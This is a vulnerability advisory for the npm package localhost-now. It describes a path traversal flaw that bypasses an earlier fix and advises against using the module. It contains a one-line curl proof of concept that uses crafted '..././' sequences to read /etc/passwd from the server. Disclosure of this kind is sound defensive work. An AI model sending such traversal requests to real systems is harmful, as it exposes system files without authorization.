GHSA-73cw-jxmm-qpgh
Dashboard / Vulnerabilities / GHSA-73cw-jxmm-qpgh
GHSA-73cw-jxmm-qpgh
Summary: Path Traversal in localhost-now
Details: All versions of `localhost-now` are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2 Proof of concept: ``` $ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd" ``` ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
References: https://hackerone.com/reports/329837, https://github.com/DCKT/localhost-now/blob/master/lib/app.js#L17, https://www.npmjs.com/advisories/655
Affected packages
Package
Name: localhost-now
Purl: pkg:npm/localhost-now
Affected ranges
Type: SEMVER
Events:
